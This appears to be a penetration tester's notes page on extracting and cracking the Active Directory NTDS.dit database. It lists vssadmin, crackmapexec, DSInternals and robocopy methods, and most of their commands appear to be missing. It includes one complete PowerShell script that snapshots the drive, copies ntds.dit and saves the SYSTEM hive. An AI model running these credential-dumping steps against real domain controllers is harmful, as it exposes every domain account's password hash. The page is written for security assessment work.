Attacking NTDS
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller. The .dit stands for directory information tree.
Alternative #1: vssadmin (locally)
1. Connecting to a DC with Evil-WinRM
2. Checking Local Group Membership
3. Checking User Account Privileges including Domain
4. Creating Shadow Copy of C: We can use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. It is very likely that NTDS will be stored on C: as that is the default location selected at install.
Results:
5. Copying NTDS.dit from the VSS: We can then copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.
6. Saving the SYSTEM hive: parsing ntds.dit offline also requires the boot key, which is derived from the SYSTEM hive, so save that hive as well.
7. Transfer both files to the attacking machine, for instance to an SMB share served by impacket's smbserver.py.
8. Extract the hashes from ntds.dit locally and crack them:
Alternative #2: crackmapexec (remotely)
Cracking a Single Hash with Hashcat
Alternative #3: DSInternals module (locally)
The DSInternals Framework exposes several internal features of Active Directory and can be used from any .NET application.
Installation
Since PowerShell 5, you can install the DSInternals module directly from the official PowerShell Gallery by running the following command:
The DSInternals PowerShell Module can also be installed using the official Chocolatey package by executing the following Chocolatey command:
This package is self-contained and it will also install all dependencies.
Commands to Extract the NTDS file + Boot Key
Alternative #4: Robocopy (locally)
The built-in utility robocopy can also copy files in backup mode (the /B switch, which relies on SeBackupPrivilege to read files regardless of their ACL). Robocopy is a command-line directory replication tool: it can be used to create backup jobs and includes features such as multi-threaded copying, automatic retry, the ability to resume copying, and more.
Robocopy differs from the copy command in that, with /MIR or /PURGE, it compares the destination directory with the source and removes files no longer present in the source, so be deliberate about which destination you point it at. Backup mode does not bypass the exclusive lock the directory service keeps on the live ntds.dit, so the source should still be a shadow copy.
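The robocopy variant as an added example (not the page's own commands): the snapshot is created and exposed as a drive letter with diskshadow, robocopy /B then pulls just ntds.dit from it, and the snapshot is removed afterwards. E: as the exposed drive letter and C:\Temp as the staging directory are assumptions.

```powershell
# Added example (not from the original page). Elevated PowerShell on the DC.
# Assumptions: E: is free to expose the snapshot on, C:\Temp is the staging directory.

# diskshadow reads its commands from a script file. "nowriters" skips VSS writers,
# "persistent" keeps the snapshot alive after diskshadow exits so we can copy from it.
@'
set context persistent nowriters
add volume C: alias ntdsvol
create
expose %ntdsvol% E:
'@ | Out-File C:\Temp\shadow.txt -Encoding ascii
diskshadow /s C:\Temp\shadow.txt

# Copy only ntds.dit from the exposed snapshot.
#   /B  = backup mode (SeBackupPrivilege, ignores the source ACL)
#   /NP = no progress output, which is noise in a remote shell
# No /MIR or /PURGE: those would delete anything in C:\Temp\ntds not also in the source.
New-Item -ItemType Directory -Path C:\Temp\ntds -Force | Out-Null
robocopy E:\Windows\NTDS C:\Temp\ntds ntds.dit /B /NP

# robocopy exit codes below 8 are success (1 = files copied); anything higher is a failure.
if ($LASTEXITCODE -ge 8) { Write-Warning "robocopy failed with exit code $LASTEXITCODE" }

# The boot key still comes from the SYSTEM hive of the live registry.
reg save HKLM\SYSTEM C:\Temp\ntds\SYSTEM

# Cleanup: delete exactly the snapshot we exposed on E:, not every shadow on the box.
@'
delete shadows exposed E:
'@ | Out-File C:\Temp\unshadow.txt -Encoding ascii
diskshadow /s C:\Temp\unshadow.txt
Remove-Item C:\Temp\shadow.txt, C:\Temp\unshadow.txt -Force
```

The exit-code check matters: robocopy returns a bitmask, so a non-zero code is normal on success and a blanket `if ($LASTEXITCODE)` would misreport a good copy.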
Cracking ntds file
secretsdump.py
secretsdump.py needs the SYSTEM hive, or the boot key already extracted from it, alongside ntds.dit to decrypt the stored hashes:
Domain Password Analysis
Once we have extracted the NTDS database we can perform offline password cracking.
We can use a tool such as DPAT to perform a domain password analysis.
Our analysis can be included in the appendices of the report with metrics such as:
- Number of password hashes obtained
- Number of password hashes cracked
- Percent of password hashes cracked
- Top 10 passwords
- Password length breakdown
- Number of Domain Admin passwords cracked
- Number of Enterprise Admin passwords cracked
Last update: 2025-05-18 Created: January 18, 2025 19:59:20